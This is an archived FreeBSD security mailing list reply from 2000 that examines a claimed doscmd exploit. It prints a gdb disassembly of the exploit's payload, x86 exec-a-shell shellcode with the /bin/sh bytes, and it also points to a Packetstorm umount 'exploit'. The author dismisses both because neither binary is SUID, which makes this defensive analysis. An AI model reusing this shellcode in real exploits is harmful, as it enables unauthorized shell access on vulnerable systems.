From owner-freebsd-security Wed Feb 16 8:42:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from builder.freebsd.org (builder.FreeBSD.ORG [204.216.27.24]) by hub.freebsd.org (Postfix) with ESMTP id 494C437B50B for ; Wed, 16 Feb 2000 08:42:55 -0800 (PST) (envelope-from hart@iserver.com) Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by builder.freebsd.org (Postfix) with ESMTP id CA933132E0 for ; Wed, 16 Feb 2000 08:42:18 -0800 (PST) Received: by gatekeeper.veriohosting.com; Wed, 16 Feb 2000 09:42:52 -0700 (MST) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma001693; Wed, 16 Feb 00 09:42:24 -0700 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id JAA66909; Wed, 16 Feb 2000 09:41:39 -0700 (MST) Date: Wed, 16 Feb 2000 09:41:39 -0700 (MST) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Doscmd In-Reply-To: <4.2.2.20000215235704.043169d0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 15 Feb 2000, Brett Glass wrote: > If it relies on doscmd being suid, then it would fail. But > I have wondered whether control of your descriptor tables would > let you hack the system. What's in that machine language? Nothing interesting. Just the standard exec-a-shell code: (gdb) x/19i 0x80487d7 0x80487d7 <_fini+7>: jmp 0x80487fc <_fini+44> 0x80487d9 <_fini+9>: popl %esi 0x80487da <_fini+10>: leal (%esi),%ebx 0x80487dc <_fini+12>: movl %ebx,0xb(%esi) 0x80487df <_fini+15>: xorl %edx,%edx 0x80487e1 <_fini+17>: movl %edx,0x7(%esi) 0x80487e4 <_fini+20>: movl %edx,0xf(%esi) 0x80487e7 <_fini+23>: movl %edx,0x14(%esi) 0x80487ea <_fini+26>: movb %dl,0x19(%esi) 0x80487ed <_fini+29>: xorl %eax,%eax 0x80487ef <_fini+31>: movb $0x3b,%al 0x80487f1 <_fini+33>: leal 0xb(%esi),%ecx 0x80487f4 <_fini+36>: movl %ecx,%edx 0x80487f6 <_fini+38>: pushl %edx 0x80487f7 <_fini+39>: pushl %ecx 0x80487f8 <_fini+40>: pushl %ebx 0x80487f9 <_fini+41>: pushl %eax 0x80487fa <_fini+42>: jmp 0x8048814 <_fini+68> 0x80487fc <_fini+44>: call 0x80487d9 <_fini+9> (gdb) x/1i 0x8048814 0x8048814 <_fini+68>: lcall 0x407,0x4040404 (gdb) x/19xb 0x8048801 0x8048801 <_fini+49>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x01 0x8048809 <_fini+57>: 0x01 0x01 0x01 0x02 0x02 0x02 0x02 0x03 0x8048811 <_fini+65>: 0x03 0x03 0x03 (gdb) For what it's worth, there is another so-called "exploit" for FreeBSD on Packetstorm Security: http://packetstorm.securify.com/0002-exploits/umount.c I don't know about you, but my /sbin/umount isn't SUID either. ;-) Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message